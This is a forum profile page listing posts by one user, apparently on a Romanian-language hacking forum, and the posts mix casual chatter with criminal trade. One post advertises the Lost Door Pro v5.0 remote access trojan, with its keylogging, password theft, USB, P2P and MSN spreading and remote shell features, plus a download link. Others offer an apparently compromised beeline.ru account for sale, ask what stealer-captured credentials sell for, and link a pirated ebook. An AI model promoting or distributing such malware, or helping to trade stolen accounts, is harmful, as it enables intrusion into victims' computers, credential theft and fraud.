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Everything posted by alexalghisi

  1. si care sunt diferentele dintre versiunea 1 si 2 ?
  2. cam slabutz ... in fine .. ce porturi trebuie forwardate ?
  3. dap l-am testat si functioneaza .. toate OCX sunt acolo
  4. pt ca deja e vechi crypterul
  5. Lost®Door Pro v5.0 Features: [+]Reverse Connection Connect Behind Firewalls & Routers [+]Date & Time Manager Edit the time and date of the remote pc [+]Control Panel Remote Reboot , ShutDown and logoff User [+]Exucutor Execute Some Software or Paths [+]Dos command Execute Dos Command on traget Machine [+]Windows manager Control opned windows (hide ,Close ,Show) [+]Screen Streamer Watch Live the Remote Desktop [+]Remote server manager Get & Edit Remote server informations [+]Server remover Remove Localy lost door server [+]Remote & Local Server Downloader Download and execute from a Website [+]Icon Changer Change Any .Exe Icon [+]Audio Streaming Hear The remote Microphone in live time [+]Encrypt Settings Encrypted informations between Client/Server [+]Volume Control Control Speakers and Microphone Volume [+]Connection Logs Lost door activities Logs [+]Instaled Appliction Get the List of instaled applications on remote Pc [+] Infect All USB Spread Lost door Server To Flash disc [+]P2P Spreading Spread lost door server via P2P (Emule ,Ares , BEarshare , Kaza..) [+]Msn Spreading Spread lost door server via Msn [+]Multilanguage Lost Door Supports 17 Languages(Arabic ,English ,French ,Spanish ,danish ,chinese ,Lativian ,Italian ,Georgian ,Russian ,Polish ,Arabic,..) [+]Services Viewer Get The list of running services on the remote machine [+]Remote passwords Get Passwords of the remote machine (MsnMessenger ,FireFox ,IE6 ,IE7 ,Yahoo Messanger ,No-Ip ,FTP ,Dialup ,FileZilla ) [+]MSN ControlerControl Remote Msn messenger via lost door (Enable Contact list , block ,open webcam ,send nudge....) [+]Remote Shell Execute .bat and VBS commands [+]Chat with server Live Chat with the Server part [+]Send fake messages Send Fake system Msgs [+] files managerBrowse Remote pc files (Execute ,Download ,Delete ,Size..) [+]Find files Search files in remote pc [+]System informations Information about remote computer [+]Clipboard manager Get and Clear the clipboard saved data [+] IE options Get and manage /open website [+]Running Process Get list of running process with the ability to kill chosen one [+]Online & Offline keylogger Get all Keystrokes on live time or already saved [+]Fun Menu some funny Stuff (Open cd ,Hide desktop ,Run screen saver ,Block mouse ...) [+]Remote Nat viewer Get list of the Active applications connecting to internet with the remote and local ports [+]Friendly GUI Nice and clean GUI with 2 Themes [+]Server Size (85kb) Download Link: http://uploading.com/files/m59372cm/Lost_Door_Pro_v5.0.zip/ Site original: http://lostdoor.netfirms.com/
  6. Virusul informatic Stuxnet afecteaz? programele de gestionare ale sistemelor industriale ?i este considerat de unii exper?i "prima super-arm? cibernetic?" din lume. Acum, s-a mutat în China, unde a infectat milioane de calculatoare. Virusul a fost proiectat s? atace instala?iile nucleare ale Iranului, potrivit adev?rul.ro, îns? acum afecteaz? ?i China. Stuxnet este periculos deoarece preia controlul asupra computerelor care comand? diverse utilaje ?i monitorizeaz? func?ionarea unor sisteme precum pompe, motoare, alarme ?i supape. Un inginer din cadrul furnizorului de solu?ii antivirus Rising International Software a declarat c?, dac? Stuxnet reu?e?te s? infecteze calculatoarele fabricilor din China, sectoarele afectate ar putea intra în colaps. Exper?ii în securitate informatic? apreciaz? c? Stuxnet ar fi putut fi conceput pentru a viza instala?iile nucleare iraniene, principalii suspec?i fiind Israelul ?i Statele Unite. New York Times subliniaz? c? nu exist? un consens între exper?i cu privire la originea Stuxnet, dar c? "sunt numeroase motive de a suspecta o implicare a Israelului". Virusul infecteaz? un program creat de Siemens care este utilizat la controlul instala?iilor industriale. Pân? acum, virusul s-a r?spândit în sisteme informatice din China, Iran, India, Indonezia ?i Pakistan. @Realitatea.net
  7. un remix romanesc mitjo cu o promovare foarte slaba
  8. shall we trust you ? if so .. why scanned on novirusthanks and not on virustotal ? scarry of not FUD anymore your virus ? nu descarcati e Trojan Dropper ....
  9. Groundbreaking strategies for reaching millions of customers online and boosting traffic, sales, and profits. This full-color, seminar-in-a-book presents a proven plan for maximizing your online profits by leveraging the top three services: eBay, Yahoo! and Google. You’ll learn to: expand an existing eBay business to reach millions of targeted buyers; Open a Yahoo! store to build a thriving direct-to-customer business; and send more customers to their online retail business with improved search engine placement and targeted adword buys using Google. How to Make Money Online with eBay, Yahoo!, and Google explains how to use cross-merchandising and integration strategies to promote sales and manage inventory across multiple sales channels. Download Link: http://uploading.com/files/1d5e826b/How.to.Make.Money.Online.with.eBay.Yahoo.and.Google.pdf/
  10. @TinKode femeile in zilele noastre se uita mai mult dupa bani iar cum acesta este un om foarte popular ... asta e .. succesul sau ii aduce de toate .
  11. lolz si eu am avut programelu ala ... park avea si mitraliera sau ceva
  12. tare piesa o ascultam destul de des acu vreo luna :>
  13. deci mortal )))
  14. iti faci un cont intri in phpmyadmin si ii dai rang
  15. ai prins si tu ceva in stealer si repede vinzi si ... asa aprox .. cat ai cere pe ele ?
  16. probabil ca a fost stealer si de aceea ti-a inchis firefoxul , caci are nevoie sa-l inchida pt a "fura" parolele .. apoi e iar functional L.E:in timp ce citeam topicu' a postat si begood deodata cu mine , scuzati pt "post inutil "
  17. nu prea cred ca incape virus in atata bucatica de program [ 21 kb ]
  18. Vand un cont de lk.beeline.ru .... are 15 USD pe el si pot fi transferati catre un VISA / MasterCard . Pret 5 euro paypal [ negociabil ] . PM me .
  19. cai sa mergem si noi la ei in tzara pe la periferie sa cautam intr-un oras si sa tragem si noi o poza , sa zicem acelasi lucru .
  20. ai pm ...
  21. oh da [message too short ]
  22. si.... cu ce e mai bun decat cain & abel ?
  23. daca e vorba despre the-west ... am eu vreo 5 [ 4 de .ro iar unul de .nl ... da-mi pm daca iti sun folositoare ]
  24. si pe langa VIP eu zic ca ar mai trebui niste sectiuni unde sa fie numar minim de posturi pt vizualizare
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